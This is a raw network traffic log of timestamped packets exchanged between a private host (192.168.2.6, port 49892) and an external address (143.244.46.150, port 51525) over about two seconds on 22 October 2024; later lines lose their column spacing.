Oct 22, 2024 09:40:45.149801016 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.149801016 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.242038965 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242048979 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242058992 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242074966 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242084980 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242100954 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.242127895 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.242218018 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242228031 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242255926 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.242660999 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242798090 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242805958 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242820978 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242830038 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.242842913 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.242866039 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.243120909 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.243168116 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.243177891 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.243202925 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.265806913 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.265824080 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.265831947 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.265860081 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.265883923 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.265918016 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.308911085 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.359106064 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359268904 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359278917 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359293938 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359303951 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359321117 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359328032 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.359373093 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.359452963 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359462023 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359471083 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.359499931 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.360122919 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.360172987 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.360253096 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.360263109 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.360311031 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.360317945 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.360328913 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.360466003 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.382764101 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.382885933 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.382921934 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.382937908 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.382980108 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.383013010 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.383049011 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.383049965 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.383094072 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.475714922 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.475724936 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.475790024 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.475850105 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.475860119 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.475904942 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.475955963 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.476120949 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476135969 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476170063 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.476421118 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476469994 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476479053 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476515055 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.476609945 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476667881 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476679087 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476718903 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.476739883 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476751089 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.476790905 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.499535084 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.499676943 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.499687910 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.499696970 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.499706030 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.499835968 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.499835968 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.542593002 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.543067932 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.543490887 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.592545986 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.592644930 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.592655897 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.592716932 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.592745066 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.592776060 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.592784882 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.592822075 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.593034983 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.593077898 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.593087912 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.593131065 CEST  49892  51525  192.168.2.6  143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.593358994 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.593404055 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.593405008 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.593415976 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.593461990 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.593509912 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.593519926 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.593559027 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.616245985 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.616297960 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.616309881 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.616357088 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.616362095 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.616393089 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.659400940 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.659439087 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.659449100 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.659492016 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.711550951 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711738110 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711747885 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711756945 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711766958 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711776018 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711786985 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711788893 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.711945057 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711946011 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.711956024 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711965084 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.711993933 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.712009907 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.712086916 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.712096930 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.712136984 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.712940931 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.733088970 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.733100891 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.733110905 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.733175039 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.776211977 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.776366949 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.776379108 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.776530027 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.826364040 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826375961 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826385975 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826396942 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826435089 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.826471090 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.826555014 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826566935 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826616049 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.826685905 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826845884 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826854944 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826884985 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.826941967 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826961040 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.826982021 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.826989889 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.827006102 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.827025890 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.827078104 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.827727079 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.827745914 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.827764988 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.827785015 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.850821018 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.851110935 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.851129055 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.851164103 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.893286943 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.893309116 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.893317938 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.893356085 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.893377066 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.942945957 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.942965031 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.942975044 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943022013 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.943061113 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943109035 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.943238974 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943248034 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943286896 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.943290949 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943301916 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943320036 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943341017 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.943737030 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943777084 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943779945 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.943788052 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943814993 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.943905115 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943916082 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.943954945 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.944385052 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.944444895 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.944456100 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.944494009 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.944567919 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.944578886 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.944617033 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.966727972 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.966743946 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.966753006 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:45.966780901 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:45.966795921 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.009973049 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.010158062 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.010209084 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060030937 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060053110 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060062885 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060122967 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060174942 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060184956 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060194969 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060204983 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060230017 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060245037 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060352087 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060391903 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060692072 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060745955 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060755014 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060787916 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060883045 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060894012 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060903072 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.060929060 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.060942888 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.061001062 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.061573982 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.061589956 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.061598063 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.061630011 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.083728075 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.083739042 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.083749056 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.083787918 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.083915949 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.083925962 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.083952904 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.137065887 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.176687002 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.176738977 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.176748991 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.176800966 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.176909924 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.176920891 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.176963091 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.176986933 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.176997900 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.177006960 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.177021027 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.177088976 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.177438021 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.177447081 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.177490950 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.177571058 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.177655935 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.177720070 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.763602972 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.763655901 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.763667107 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.763676882 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.763689041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.763696909 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.763722897 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.763796091 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.763837099 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.764400959 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.764446974 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.764457941 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.764486074 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.764513969 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.764554024 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.784915924 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.784933090 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.784975052 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.785077095 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.785115957 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.785125971 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.785151005 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.785253048 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.785262108 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.785291910 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.826169014 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.826183081 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.826193094 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.826199055 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.826258898 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.826262951 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.826287031 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.826299906 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.826363087 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.871438980 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.879903078 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.879942894 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.879954100 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880064011 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880074024 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880086899 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880096912 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880108118 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.880110025 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.880168915 CEST4989251525192.168.2.6143.244.46.150
